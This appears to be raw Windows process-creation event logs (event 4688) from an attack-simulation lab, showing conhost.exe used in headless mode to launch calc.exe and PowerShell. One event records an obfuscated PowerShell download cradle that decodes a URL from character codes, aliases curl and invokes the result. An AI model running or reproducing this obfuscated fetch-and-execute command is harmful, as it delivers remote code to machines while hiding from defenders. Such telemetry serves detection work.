4688201331200x8020000000000000984371Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x44f1dd0x4138C:\Windows\System32\conhost.exe%%19360x368c"C:\Windows\system32\conhost.exe" conhost --headless powershell = richard net-secure get-container display-addinNULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level
4688201331200x8020000000000000984370Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x44f1dd0x4320C:\Windows\System32\conhost.exe%%19360x23e4C:\Windows\system32\conhost.exe conhost --headless powershell $zxudtpbnalwe=('richard','net-secure','get-container', 'display-addin'); $qnzvmgkpdywc=(8960,8963,8954,8967,8971,8954,8955,8950,8895,8965,8960,8961,8896,8898,8895,8961,8953,8961,8912,8953,8946,8964,8953,8910);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $qnzvmgkpdywc){$awi=$rob9e;$eidwfyxmatvs=$eidwfyxmatvs+[char]($awi-8849);$vizit=$eidwfyxmatvs; $lira=$vizit};$zxudtpbnalwe[2]=$lira ;$rpkuao='rl';$five=1;new-alias zwert cu$rpkuao;.$([char](9992-9887)+'ex')(zwert -useb $zxudtpbnalwe[7487-7485]) NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level
4688201331200x8020000000000000984119Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x44f1dd0x347cC:\Windows\System32\conhost.exe%%19360x23e4c:\windows\System32\conhost.exe --headless calc.exeNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level
4688201331200x8020000000000000984109Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x44f1dd0x1bfcC:\Windows\System32\conhost.exe%%19360x23e4c:\Windows\System32\conhost.exe --headless calc.exeNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level